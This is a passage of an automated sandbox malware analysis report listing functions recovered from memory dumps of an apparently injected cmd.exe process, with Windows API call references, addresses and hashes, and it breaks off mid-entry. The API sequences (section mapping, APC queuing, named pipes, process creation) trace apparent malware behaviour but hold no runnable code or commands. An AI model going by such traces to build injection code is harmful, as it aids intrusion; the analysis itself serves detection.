Part of subcall function 03032DF0: SetLastError.KERNEL32(00000000), ref: 03032E41

GetLastError.KERNEL32(0303C75F,00000000,00000000,?,00000000,?,?,0302DA8B,?,?,?), ref: 0303D51F
CloseHandle.KERNEL32(00000000,?,00000000,?,?,0302DA8B,?,?,?), ref: 0303D52F

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: ae2a842b9e5ecf2248d91744ef13b8e45612a3d99725a0f0aacb1e189e7952fd
Instruction ID: 2b5a71ccf8d9b72a20d1bd595d326b8baf2a7d455caee49016ae692380a816c1
Opcode Fuzzy Hash: ae2a842b9e5ecf2248d91744ef13b8e45612a3d99725a0f0aacb1e189e7952fd
Instruction Fuzzy Hash: 8AF0F4F93073416FE350AA6CAC49F3B765CEB47374B000A35FA66C6294C7704D118660

Uniqueness

Uniqueness Score: -1.00%

Function 0303DBAF Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(03048080,00000000), ref: 0303DBBB
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0303DBD6
lstrcpy.KERNEL32(00000000,?), ref: 0303DBFF
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0303DC20

Part of subcall function 0303875D: SetEvent.KERNEL32(?,?,0303EDFC), ref: 03038772
Part of subcall function 0303875D: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,0303EDFC), ref: 03038792
Part of subcall function 0303875D: RtlEnterCriticalSection.NTDLL(?), ref: 030387AD
Part of subcall function 0303875D: RtlLeaveCriticalSection.NTDLL(?), ref: 030387C5
Part of subcall function 0303875D: LocalFree.KERNEL32(?), ref: 030387EC
Part of subcall function 0303875D: RtlDeleteCriticalSection.NTDLL(?), ref: 030387F6

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID:
API String ID: 3339210832-0
Opcode ID: 50faf9ecc90c03c85aa7ac3c3a3dd281cdce7762828984d265d9df0c542194b0
Instruction ID: 89d92abe8f88c5f52fecd2534cbd29e24fd85511bd0cf0805f1dd5d62125b89c
Opcode Fuzzy Hash: 50faf9ecc90c03c85aa7ac3c3a3dd281cdce7762828984d265d9df0c542194b0
Instruction Fuzzy Hash: 5AF0F4BD353310A7D670BA61EE0DF4A3E5CEB85B50F044920F2009A284CB79D611C760

Uniqueness

Uniqueness Score: -1.00%

Function 03022934 Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 03022946

Part of subcall function 03025697: GetLastError.KERNEL32(?,00000080,00000000), ref: 030256E1
Part of subcall function 03025697: WaitForSingleObject.KERNEL32(000000C8,?,00000080,00000000), ref: 03025706
Part of subcall function 03025697: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,00000080,00000000), ref: 03025751
Part of subcall function 03025697: WriteFile.KERNEL32(?,00001388,?,?,00000000,?,00000080,00000000), ref: 03025766
Part of subcall function 03025697: SetEndOfFile.KERNEL32(?,?,00000080,00000000), ref: 03025773
Part of subcall function 03025697: CloseHandle.KERNEL32(?,?,00000080,00000000), ref: 0302578B

WaitForSingleObject.KERNEL32(00002710,?,?,?,00000005,?,?,?,?,?), ref: 03022969
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,00000005,?,?,?,?,?), ref: 0302298B
GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,00000005,?,?,?,?,?), ref: 0302299F

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: File$ErrorLastObjectSingleWait$CloseCreateHandlePointerWritelstrcat
String ID:
API String ID: 3733872353-0
Opcode ID: f4358cbcc63ff7e449b78911010627d33cdfcd36810f28a6b44d0c3938bad6c4
Instruction ID: dfe306869e54be2813ca7ff683e62c762dac6bc4b504d14653d8cc0f8e4cc9dd
Opcode Fuzzy Hash: f4358cbcc63ff7e449b78911010627d33cdfcd36810f28a6b44d0c3938bad6c4
Instruction Fuzzy Hash: 2DF0AF39242214BFEB61AFA5DD0AF9E3F69AF05710F104904F641980D0D77692708B69

Uniqueness

Uniqueness Score: -1.00%

Function 030407D3 Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,0302BD88,000000FF,03048164,?,?,0303F562,0000003A,03048164), ref: 030407EF
GetLastError.KERNEL32(?,?,0303F562,0000003A,03048164,?,?,?,030332F0,00000001,00000000,030483D0), ref: 030407FA
WaitNamedPipeA.KERNEL32(00002710), ref: 0304081C
WaitForSingleObject.KERNEL32(00000000,?,?,0303F562,0000003A,03048164,?,?,?,030332F0,00000001,00000000,030483D0), ref: 0304082A

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: f0f04f42c09faf8c6c74a816c4b88482ef650b43328d28a6770915b4b93984cc
Instruction ID: fa34acfc095749d7526b7e1fc762112402f80f9e9f64caadb4d7bcb036fc869f
Opcode Fuzzy Hash: f0f04f42c09faf8c6c74a816c4b88482ef650b43328d28a6770915b4b93984cc
Instruction Fuzzy Hash: 32F0F6B96071206BD3306668AE4CB47FF98EB40361F104A71FB89F21E4C3360E60CA90

Uniqueness

Uniqueness Score: -1.00%

Function 030240F1 Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,03047D10,00000000,0303A093,03047D10,?,03047CC0,?,?,0302DBD6,?,00000015,00003219), ref: 030240F6
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0302410B
wsprintfA.USER32 ref: 03024127

Part of subcall function 03033F6E: memset.NTDLL ref: 03033F83
Part of subcall function 03033F6E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 03033FBC
Part of subcall function 03033F6E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 03033FF7
Part of subcall function 03033F6E: TerminateProcess.KERNEL32(?,000003E5), ref: 03034039

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 03024143

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: HeapProcesslstrlen$AllocateCreateFreeTerminatememsetwsprintf
String ID:
API String ID: 2763937253-0
Opcode ID: 9aca927a93b715494fb93684653a2a7e9c027484003c53dae24062961bb696d9
Instruction ID: 73fd88784a153ca26f82cfddae5455a6dedb82b2d89b057398d70d6d5bf297b5
Opcode Fuzzy Hash: 9aca927a93b715494fb93684653a2a7e9c027484003c53dae24062961bb696d9
Instruction Fuzzy Hash: AEF089BE103120BBD661772EFE09F5BBA7DDFD2B20F150261F901D7194D728DA118664

Uniqueness

Uniqueness Score: -1.00%

Function 03031CA7 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03031CC6

Part of subcall function 0303D547: RtlEnterCriticalSection.NTDLL(03048088), ref: 0303D553
Part of subcall function 0303D547: CloseHandle.KERNEL32(00000000), ref: 0303D561
Part of subcall function 0303D547: RtlLeaveCriticalSection.NTDLL(03048088), ref: 0303D57D

CloseHandle.KERNEL32(?), ref: 03031CD4
InterlockedDecrement.KERNEL32(0304807C), ref: 03031CE3

Part of subcall function 03027FAB: SetEvent.KERNEL32(030481C8,03031CFE), ref: 03027FB5
Part of subcall function 03027FAB: CloseHandle.KERNEL32(030481C8), ref: 03027FCA
Part of subcall function 03027FAB: HeapDestroy.KERNEL32(03048078), ref: 03027FDA

RtlExitUserThread.NTDLL(00000000), ref: 03031CFF

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
String ID:
API String ID: 1141245775-0
Opcode ID: fcc0f10253f7e96a84dcc12751dda7fb65acf7281887f6371c58d9c9f546f522
Instruction ID: 024be9dbb703705b61b9e712d194711a19a4ceb89024b59b067483ac732c4a32
Opcode Fuzzy Hash: fcc0f10253f7e96a84dcc12751dda7fb65acf7281887f6371c58d9c9f546f522
Instruction Fuzzy Hash: 2BF0AFF8542204BBC705EB68C809EA93BBCEF8A731F114759F925872D0DB749A118BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0303476C Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0304838C), ref: 03034775
Sleep.KERNEL32(0000000A,?,030391EF,00000000,00000000,0302AE17,?,00000000), ref: 0303477F
HeapFree.KERNEL32(00000000,FFFFFFFF,?,030391EF,00000000,00000000,0302AE17,?,00000000), ref: 030347A7
RtlLeaveCriticalSection.NTDLL(0304838C), ref: 030347C5

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 0de329140d021405b775cd347f495848bac78fa1553189294e918183a8b99237
Instruction ID: 766cd5e4b9b2027379802e306b7d72c4dd745e490b44cd47cc1cda81bf7a4eb6
Opcode Fuzzy Hash: 0de329140d021405b775cd347f495848bac78fa1553189294e918183a8b99237
Instruction Fuzzy Hash: 29F0BEF9203201AFE720EB69DA89F1B7BE8AB02B00F048844F145EB255D335EA10CB18

Uniqueness

Uniqueness Score: -1.00%

Function 030211FC Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0304838C), ref: 03021205
Sleep.KERNEL32(0000000A,?,030391EF,00000000,00000000,0302AE17,?,00000000), ref: 0302120F
HeapFree.KERNEL32(00000000,?,?,030391EF,00000000,00000000,0302AE17,?,00000000), ref: 0302123D
RtlLeaveCriticalSection.NTDLL(0304838C), ref: 03021252

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 557641159906e2f033708c2919048e19fbc8eaf59a0e796b493f0dfdb7d27098
Instruction ID: 0f35298cefc3aa46c50a95a4cc87ac512ec5cd362e70c26450834a674fd70bab
Opcode Fuzzy Hash: 557641159906e2f033708c2919048e19fbc8eaf59a0e796b493f0dfdb7d27098
Instruction Fuzzy Hash: 5DF0BEFC2032029FE708EF54DA89B157BF4AB00702B049959F806D7394E339AA20CF08

Uniqueness

Uniqueness Score: -1.00%

Function 0302DE3C Relevance: 5.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0302E0E9

Part of subcall function 0303B04C: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,?,?,?,0302DF56,?,?,0303DB75,?,00000000), ref: 0303B071

Part of subcall function 030301C6: memcpy.NTDLL(6A5F0866,6A5F086E,?,?,0303DB75,?,?,?,?,?,0303DB75,?,00000000), ref: 0303023A
Part of subcall function 030301C6: memcpy.NTDLL(?,?,?), ref: 030302A1

memcpy.NTDLL(?,?,?,?,?,?,?,?,0303DB75,?,00000000), ref: 0302DFB5

Part of subcall function 03022A2A: GetModuleHandleA.KERNEL32(?,?,0303DB75,0302E070,0303DB75,0303DB75,?,00000000), ref: 03022A68
Part of subcall function 03022A2A: memcpy.NTDLL(?,0304832C,00000018,?,?,?), ref: 03022AE4

memcpy.NTDLL(0303DB8D,?,00000018,?,?,?,?,?,0303DB75,?,00000000), ref: 0302E003
memcpy.NTDLL(0303DB35,030263E7,00000800,0303DB75,0303DB75,?,00000000), ref: 0302E083

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memcpy$HandleModule$memset
String ID:
API String ID: 2004588391-0
Opcode ID: 31f36981522dfc9261ca5e2c6116050c9c8d8314b7d2315a942765dfbec012b8
Instruction ID: 92e671beb8fcde951ad4a3a269d41bfb2acbcfcab47440f073e093aa1cd62f0e
Opcode Fuzzy Hash: 31f36981522dfc9261ca5e2c6116050c9c8d8314b7d2315a942765dfbec012b8
Instruction Fuzzy Hash: 319169B5D0221AEFDF11DF98C980AEEBBF8FF04304F144469E811AB250D775AA95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0303A579 Relevance: 5.2, APIs: 4, Instructions: 172memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0303A5D8
CloseHandle.KERNEL32(?,00000000,00000100,?,00000000,?,0302C1CF,00000000), ref: 0303A626
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,0302F26B,00000000,0302C1CF,0303F415,00000000,0302C1CF,03029792,00000000,0302C1CF,Function_00009165,00000000,0302C1CF), ref: 0303A8DF
GetLastError.KERNEL32(?,00000000,?), ref: 0303ABE3

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 783a794babcc287a21d85b2099ebda8a62e9b4fff40462ec864f6ff3cbe316ea
Instruction ID: a9317e46164e807fdc4f29bf7b96721586921f562cd8cc7cefa8cb5e0b65fc76
Opcode Fuzzy Hash: 783a794babcc287a21d85b2099ebda8a62e9b4fff40462ec864f6ff3cbe316ea
Instruction Fuzzy Hash: 4C510175757218FEDB21EF34CC05FEF7A6EEB87750F004822B9869A092DA70C95087A1

Uniqueness

Uniqueness Score: -1.00%

Function 0303FAFE Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0303FB24
memcpy.NTDLL ref: 0303FB4C

Part of subcall function 030384EA: RtlNtStatusToDosError.NTDLL(00000000), ref: 03038522
Part of subcall function 030384EA: SetLastError.KERNEL32(00000000), ref: 03038529

GetLastError.KERNEL32(00000010,00000218,0304254D,00000100,?,00000318,00000008), ref: 0303FB63
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0304254D,00000100), ref: 0303FC46

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: 90d633dc5b5a03dcc8fbf8863ab55b4e689207fd36a224894695e79ce8ecb80e
Instruction ID: 051fa1f7274b1a23e2020420aa15ea000de38ffb07ece7613bb5366ba774dfe3
Opcode Fuzzy Hash: 90d633dc5b5a03dcc8fbf8863ab55b4e689207fd36a224894695e79ce8ecb80e
Instruction Fuzzy Hash: 854192B5945302AFD761DF24DD41BABBBEDFB89310F00892DF998C6290E770D5148B62

Uniqueness

Uniqueness Score: -1.00%

Function 0303F8D0 Relevance: 5.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,03038DC8,00000000,?,?,?,03038DC8,?,?,?,?,?), ref: 0303F90E
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0303F99B
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0303F9D9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0303F9E7

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memcpy$FreeLocal
String ID:
API String ID: 2365274387-0
Opcode ID: 2a9930eb7cb28b0f9add5118d7a64cdbae157c87ca1d05e44c4e23f3308e8f6f
Instruction ID: b945c6fd58aa8862c8fb664870e73e666b8117a11cd787aee4c7a23a70cd3d6b
Opcode Fuzzy Hash: 2a9930eb7cb28b0f9add5118d7a64cdbae157c87ca1d05e44c4e23f3308e8f6f
Instruction Fuzzy Hash: 9F4109B680221AAFCF11EF68DD418DF7BA8EF452A4B054426FC14A7210E731DE60CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0302FA39 Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0302FA84
memset.NTDLL ref: 0302FA9B
memset.NTDLL ref: 0302FAB2
memset.NTDLL ref: 0302FACA

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 1c9758099e02e768e208264c71b89ecf995749e607f2a970a3480dd3cfe3e21a
Instruction ID: 85d95d33feb67dfaa36c39a84fed443eccd2f30f3890d38a84d61224ee853f4c
Opcode Fuzzy Hash: 1c9758099e02e768e208264c71b89ecf995749e607f2a970a3480dd3cfe3e21a
Instruction Fuzzy Hash: 97216DB250251ABBCB60DF65DC8096ABFBAFF0934075A0618E9458AC10D772A9B1CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 03041702 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,00000000,00000008,00000000,?,03029EF2,?,00000000,00000004,00000000), ref: 0304170E

Part of subcall function 0302E83D: RtlAllocateHeap.NTDLL(00000000,?,03034741), ref: 0302E849

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,03029EF2,?,00000000,00000004,00000000), ref: 0304176C
lstrcpy.KERNEL32(00000000,00000008), ref: 0304177C
lstrcpy.KERNEL32(00000000,00000000), ref: 03041788

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 7748599a725115214535acbd414b24fc40d95c0a1daf975c8fe084d46b08d48f
Instruction ID: 795b8413d02cf2c3b48aadf82e4e60adbe2e1e9fd7c01a6d5e7187de2fdc0a72
Opcode Fuzzy Hash: 7748599a725115214535acbd414b24fc40d95c0a1daf975c8fe084d46b08d48f
Instruction Fuzzy Hash: 592193F9505255ABCB12EF74C984AAFBFF9AF45284B084065F9499F201E735CA50C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0303B132 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0303B166
memset.NTDLL ref: 0303B17D
memset.NTDLL ref: 0303B194
memset.NTDLL ref: 0303B1AC

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 81ea673d10932c8171c615a4c68006ec9cd697a5300c55123b0af308c3db69df
Instruction ID: e332f89f61b6647480ab4ef3739fd600d7b8701356478d841c97724df60fb16a
Opcode Fuzzy Hash: 81ea673d10932c8171c615a4c68006ec9cd697a5300c55123b0af308c3db69df
Instruction Fuzzy Hash: 4311E373902A0ABBCB20DF94EC40A96BF7DFF4A304B440518F94685840D332B9B1DBD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmd.exePID: 1920, Parent PID: 3528COMMON

Executed Functions

Function 000001CEDB4088C8 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 489
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 000001CEDB408BFB

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: b4a30faad1bdb2d929a66f1959b7937a828d2da89aa499a9ec604f418c93b63c
Instruction ID: 2c4285d5696fe1af325ba445889b0304e28404d7e3449d64385607fd838aa597
Opcode Fuzzy Hash: b4a30faad1bdb2d929a66f1959b7937a828d2da89aa499a9ec604f418c93b63c
Instruction Fuzzy Hash: 84F15130658B498BFB98EF58D884BA673E1FB98301F444629E44BC3691FF34ED418B85

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3E2950 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationToken.NTDLL ref: 000001CEDB3E2A04
NtQueryInformationToken.NTDLL ref: 000001CEDB3E2A4C

Strings

0, xrefs: 000001CEDB3E29AF

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: InformationQueryToken
String ID: 0
API String ID: 4239771691-4108050209
Opcode ID: 1378cd4870809fc7bf81bc70a46f9d4ede2f121dfa1a3c01f7f42faed25260b0
Instruction ID: 0147a6ae822011e69c58a16033159d8ccb2c87208d1ac6ae011ad3f61b6e5287
Opcode Fuzzy Hash: 1378cd4870809fc7bf81bc70a46f9d4ede2f121dfa1a3c01f7f42faed25260b0
Instruction Fuzzy Hash: 02410C30618B488FDB64EF59D8C4BAAB7E6FBD8301F50492EE48AC3251DB34D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3E8454 Relevance: 4.1, APIs: 2, Instructions: 1081
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNEL32 ref: 000001CEDB3E8521
GetUserNameA.ADVAPI32 ref: 000001CEDB3E875A

Part of subcall function 000001CEDB3FD180: CreateThread.KERNELBASE ref: 000001CEDB3FD1B0
Part of subcall function 000001CEDB3FD180: QueueUserAPC.KERNELBASE ref: 000001CEDB3FD1C7

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: 7da4403c81f2b50a42965722f77b996ce5b725f19b502f7d59bf9eebe1c57a95
Instruction ID: 98f26a9f8c1ab8e41436b49c2aa34cd99ff4892d65ef1f137aeee8564e689ecd
Opcode Fuzzy Hash: 7da4403c81f2b50a42965722f77b996ce5b725f19b502f7d59bf9eebe1c57a95
Instruction Fuzzy Hash: F4828730658A048FFB79EF68EC85AAD73E1F768701F20461BD44BC35A1EA74D9439B81

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB4057D8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 000001CEDB40597A

Part of subcall function 000001CEDB3F94A8: NtMapViewOfSection.NTDLL ref: 000001CEDB3F94F4

Strings

0, xrefs: 000001CEDB40596E

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: d69a738330f0bad9c02a7a532f2a04c00e1f6c45fa618e10374661bf8e8e01e9
Instruction ID: 738ae59f853536c31e1ce312382df9fbe3b616e096cc5b658ff3e3dfdbf6cbe3
Opcode Fuzzy Hash: d69a738330f0bad9c02a7a532f2a04c00e1f6c45fa618e10374661bf8e8e01e9
Instruction Fuzzy Hash: E371B070618B098FEB54EF58D889BA577E1FB98311F10456EE88AC7261EB34DC41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3E73BC Relevance: 3.2, APIs: 2, Instructions: 183
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 000001CEDB3E7431
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001CEDB3E7580

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: BoundaryDeleteDescriptorInformationProcessQuery
String ID:
API String ID: 130161160-0
Opcode ID: 12069c5da3662b30fdebc94500420212d9863b15559b82534fe63e7079c8f4dd
Instruction ID: 48cf8178589b0112a665f61394f0937ca68158c447ac361df1c35ea7b83ec9ef
Opcode Fuzzy Hash: 12069c5da3662b30fdebc94500420212d9863b15559b82534fe63e7079c8f4dd
Instruction Fuzzy Hash: FD517330658A488BFB59EB58D885BFA73D5FB98340F00466EE44AC3285EE74D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3E1AE8 Relevance: 1.8, APIs: 1, Instructions: 292
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 000001CEDB3E1B42

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 07b6312a2700137879e70697d21969703cc8ecc1f7f594ea8ac3a901bb7050d0
Instruction ID: 9fb45efd18370ab66eb2acb4dcf4887230620973ee32bbff20bd97088827488e
Opcode Fuzzy Hash: 07b6312a2700137879e70697d21969703cc8ecc1f7f594ea8ac3a901bb7050d0
Instruction Fuzzy Hash: BA91B330658A098FFB69EF689884BBA33E5FBA4310F10462ED44BC35A1FF74D9469741

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3E5F64 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 000001CEDB3E5F8A

Memory Dump Source

Source File: 00000029.00000002.718314650.000001CEDB3E1000.00000020.80000000.00040000.00000000.sdmp, Offset: 000001CEDB3E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1cedb3e1000_cmd.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b5b16d049a50f217bd4c512ed7e770a66e0ea8ad56f5b45801aa655cad690094
Instruction ID: abfabacf00ebf6bc2c8b7f79acb91d58f01858945131fc8892348f8eb89b61fa
Opcode Fuzzy Hash: b5b16d049a50f217bd4c512ed7e770a66e0ea8ad56f5b45801aa655cad690094
Instruction Fuzzy Hash: 7D018F30255A0DCFEBD4EFA8D4C4A79B3E1FBA8345B51416E980AC7150E668D982C701

Uniqueness

Uniqueness Score: -1.00%

Function 000001CEDB3F94A8 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

